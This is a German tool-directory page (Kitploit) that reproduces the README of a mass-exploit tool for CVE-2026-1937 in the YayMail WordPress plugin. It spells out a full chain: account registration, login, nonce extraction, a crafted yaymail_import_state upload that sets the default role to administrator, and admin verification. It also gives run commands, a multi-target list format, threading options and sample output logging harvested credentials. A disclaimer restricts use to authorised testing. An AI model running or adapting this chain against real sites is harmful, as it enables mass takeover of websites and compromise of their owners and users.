Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1937 — YayMail <= 4.3.2 - Fehlende Autorisierung für beliebige Options-Aktualisierungen durch authentifizierte Benutzer (Shop Manager+) über die AJAX-Aktion 'yaymail_import_state' | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-1937
Authentifizierung & AutorisierungPrivilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubnxploited/cve-2026-1937

CVE-2026-1937

YayMail <= 4.3.2 - Fehlende Autorisierung für beliebige Options-Aktualisierungen durch authentifizierte Benutzer (Shop Manager+) über die AJAX-Aktion 'yaymail_import_state'

Repository anzeigen
3vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Typing SVG


🔴 Überblick über die Schwachstelle

CVE-2026-1937 — Fehlende Autorisierung → Beliebige Options-Änderung → Privilegienausweitung

Beschreibung:
Das YayMail – WooCommerce Email Customizer-Plugin für WordPress ist in allen Versionen bis einschließlich 4.3.2 anfällig für eine nicht autorisierte Änderung von Daten, die zu einer Privilegienausweitung führt. Die AJAX-Aktion yaymail_import_state ist ohne serverseitige Berechtigungsprüfung registriert, sodass authentifizierte Angreifer mit Shop-Manager-Zugriff oder höher sie frei aufrufen können. Durch das Hochladen einer präparierten ZIP-Importdatei kann der Angreifer beliebige WordPress-Optionen der Website stillschweigend überschreiben — einschließlich der Einstellung der Standard-Benutzerrolle für neue Registrierungen auf administrator und der Aktivierung der offenen öffentlichen Registrierung. Sobald diese Optionen injiziert sind, kann sich jeder Besucher auf der Website selbst registrieren und ein vollwertiges WordPress-Administrator-Konto erhalten, was zu einer vollständigen Kompromittierung der Website führt.


🛠️ Tool-Beschreibung

Dies ist eine Proof-of-Concept (PoC)-Massen-Exploit-Kette, die auf WordPress- + WooCommerce-Installationen mit einer verwundbaren Version des YayMail-Plugins abzielt. Das Tool implementiert einen vollständigen End-to-End-Angriff: WooCommerce-Registrierung → Login → YayMail-Nonce-Extraktion → yaymail_import_state-Exploit → Admin-Verifizierung.

🔗 Vollständige Angriffskette

root@kitploit:~
[Phase 1 — Registration]
  GET  /my-account/  →  Extract WooCommerce register nonce
  POST /my-account/  →  Register new account (WooCommerce form)
  → Save credentials to reg.txt

          ↓

[Phase 2 — Login]
  POST /wp-login.php         →  Try WordPress native login
  POST /my-account/ (WooC.)  →  Fallback WooCommerce login
  → Establish authenticated session

          ↓

[Phase 3 — Admin Pre-check]
  GET /wp-admin/  →  If already admin, skip to result

          ↓

[Phase 4 — YayMail Exploit]
  GET /wp-admin/admin.php?page=yaymail-settings
  → Extract: ajax_url + nonce

  POST /wp-admin/admin-ajax.php
  action=yaymail_import_state
  nonce=<extracted_nonce>
  import_file=yaymail_backup.zip
  → Override WordPress options:
    · default_role = administrator
    · users_can_register = 1

          ↓

[Phase 5 — Admin Verification]
  GET /wp-admin/        → Check adminmenu / wp-admin-bar
  GET /wp-admin/users.php   → Confirm manage_options access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com user:<u> pass:<p>

📋 Anforderungen

Systemanforderungen

  • Python 3.8 oder höher
  • Linux / Windows / macOS
  • yaymail_backup.zip — präparierte Import-Payload (erforderlich)

Python-Abhängigkeiten

root@kitploit:~
pip install requests urllib3 rich

Oder über die Anforderungsdatei:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1937.git
cd CVE-2026-1937

# Install dependencies
pip install -r requirements.txt

# Place your crafted import payload in the same directory
cp /path/to/yaymail_backup.zip .

# Run the tool
python3 CVE-2026-1937.py

⚙️ Verwendung

Grundlegender Aufruf

root@kitploit:~
python3 CVE-2026-1937.py

Das Tool verwendet eine vollständig interaktive Terminaloberfläche, die auf Rich basiert.


🗂️ Format der Zielliste

Erstellen Sie eine einfache Textdatei (Standard: list.txt) — ein Ziel pro Zeile:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com
target4.com

Ziele ohne http:// oder https:// werden automatisch mit https:// ergänzt.


🖥️ Interaktive Eingabeaufforderungen

root@kitploit:~
Username   [Nx_admin]:          Nx_admin
Password   [Nx_adminSA]:        Nx_adminSA
Email      [[email protected]]: [email protected]
Targets file [list.txt]:        list.txt
Threads [3]:                    5
HTTP timeout (seconds) [10]:    10

📦 Payload-Datei — yaymail_backup.zip

Der Exploit erfordert eine präparierte YayMail-Import-ZIP-Datei, die beim Import die folgenden WordPress-Optionen überschreibt:

WordPress-OptionInjizierter Wert
default_roleadministrator
users_can_register1

⚠️ Das Tool weigert sich zu starten, wenn yaymail_backup.zip nicht im Arbeitsverzeichnis vorhanden ist.


🔬 Verwundbarer AJAX-Endpunkt

root@kitploit:~
POST /wp-admin/admin-ajax.php
root@kitploit:~
action=yaymail_import_state
nonce=<extracted_from_yaymail_settings_page>
import_file=yaymail_backup.zip  (multipart upload)

Grundursache:
Der yaymail_import_state-Handler ruft vor der Verarbeitung des Imports keine current_user_can()-Prüfung oder eine gleichwertige Berechtigungsprüfung auf. Jeder Benutzer mit der Rolle shop_manager (oder höher) kann diese Aktion frei aufrufen und über den ZIP-Importmechanismus beliebige Einträge der Tabelle wp_options überschreiben.


🔍 Durchsuchte WooCommerce-Seiten

Das Tool scannt automatisch die folgenden Pfade nach den Registrierungs- und Login-Formularen:

root@kitploit:~
/my-account/       /my_account/      /My-account/
/account/          /myaccount/       /customer-login/
/login/            /register/        /sss/

📁 Ausgabedateien

DateiBeschreibung
reg.txtAlle erfolgreichen WooCommerce-Registrierungen mit Anmeldedaten
Nx_admin.txtAlle bestätigten Administrator-Eskalationen

✅ Ausgabeformat

reg.txt:

root@kitploit:~
[2026-03-01 14:22:10] https://target.com user:Nx_admin email:[email protected] pass:Nx_adminSA

Nx_admin.txt:

root@kitploit:~
[2026-03-01 14:22:18] https://target.com user:Nx_admin pass:Nx_adminSA | yaymail import

🖥️ Beispiel für die Terminalausgabe

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  WooCommerce · YayMail · Mass Exploit Chain                      ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝

[SCAN]            https://target.com
[REGISTERED]      https://target.com  ::  user: Nx_admin pass: Nx_adminSA
[LOGIN-WP]        https://target.com  ::  wp-login.php
[SEARCH-NONCE]    https://target.com  ::  not admin, trying YayMail chain
[NONCE-FOUND]     https://target.com  ::  nonce: a1b2c3d4e5
[EXPLOIT]         https://target.com  ::  nonce: a1b2c3d4e5
[SUCCESS]         https://target.com  ::  user: Nx_admin pass: Nx_adminSA

┌──────────────────────────────────────���───────────────────────────────────┐
│ Target               │ Status                    │ Credentials / Note    │
├──────────────────────────────────────────────────────────────────────────┤
│ https://target.com   │ ✅ EXPLOITED (ADMIN VERIFIED) │ user: Nx_admin …  │
│ https://target2.com  │ NO-REGISTER               │                       │
│ https://target3.com  │ DEAD                      │                       │
└──────────────────────────────────────────────────────────────────────────┘

📊 Referenz der Statuscodes


📡 Kontakt & Autor

Von: Nxploited (Khaled Alenazi)

 


⚠️ Rechtlicher Hinweis

DIESES TOOL WIRD NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSFORSCHUNG BEREITGESTELLT.

Der Autor, Nxploited (Khaled Alenazi), und alle Mitwirkenden an diesem Projekt billigen, unterstützen oder übernehmen keinerlei Verantwortung für den Missbrauch dieses Tools oder für Schäden, die durch die Verwendung dieser Software gegen Systeme entstehen, für die Sie keine ausdrückliche schriftliche Genehmigung besitzen.

  • ✅ Erlaubt: Verwendung auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen erhalten haben.
  • ❌ Verboten: Verwendung gegen Systeme ohne vorherige ausdrückliche schriftliche Genehmigung des Systeminhabers.

Unbefugter Zugriff auf Computersysteme ist illegal und wird nach geltendem Recht geahndet, einschließlich, aber nicht beschränkt auf den Computer Fraud and Abuse Act (CFAA), den Computer Misuse Act (CMA) und entsprechende Gesetze weltweit.

Mit der Nutzung dieses Tools übernehmen Sie die alleinige und vollständige Verantwortung für Ihre Handlungen und bestätigen, dass Sie die rechtliche Befugnis haben, die Zielsysteme zu testen.

Der Autor übernimmt keinerlei Haftung für direkte, indirekte, beiläufige oder Folgeschäden, die aus der Nutzung oder dem Missbrauch dieser Software entstehen.


© 2026 Nxploited (Khaled Alenazi) — Nur für autorisierte Sicherheitsforschung.

Tool herunterladen
FeldDetails
CVE-IDCVE-2026-1937
SchweregradHOCH — CVSS-v3.1-Score: 7.2
VektorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ForscherDaniel Basta (whizzu) — NASK PIB
Öffentlich veröffentlicht17. Februar 2026
Zuletzt aktualisiert27. März 2026
Betroffene SoftwareYayMail – WooCommerce Email Customizer Plugin für WordPress
Betroffene VersionenAlle Versionen bis einschließlich 4.3.2
SchwachstellenartFehlende Autorisierung → Nicht autorisierte beliebige Options-Änderung → Privilegienausweitung
Erforderliche AuthentifizierungJa — Shop-Manager-Ebene oder höher
CWECWE-862: Missing Authorization
StatusFarbeBedeutung
EXPLOITED (ADMIN VERIFIED)🟢 GrünVollständiger Kettenerfolg — Admin bestätigt
EXPLOITED (ADMIN)🟢 GrünRegistrierter Benutzer war bereits Admin
PARTIAL🟡 GelbYayMail-Import erfolgreich, aber Admin-Zugriff nicht bestätigt
REGISTERED🟡 GelbWooCommerce-Registrierung erfolgreich
LOGIN-WP🔵 CyanÜber /wp-login.php angemeldet
LOGIN-WOO🔵 CyanÜber das WooCommerce-Formular angemeldet
NONCE-FOUND🟣 MagentaYayMail-Nonce erfolgreich extrahiert
NO-REGISTER⚫ DunkelWooCommerce-Registrierungsformular nicht gefunden
LOGIN-FAILED⚫ DunkelAuthentifizierte Sitzung konnte nicht hergestellt werden
NONCE-NOT-FOUND⚫ DunkelYayMail-Einstellungsseite nicht erreichbar oder Nonce fehlt
EXPLOIT-FAILED🔴 Rotyaymail_import_state-Aufruf lieferte keinen Erfolg
TIMEOUT⚫ DunkelHTTP-Timeout
DEAD⚫ DunkelVerbindung abgelehnt / nicht erreichbar
ERROR🔴 RotUnerwartete Ausnahme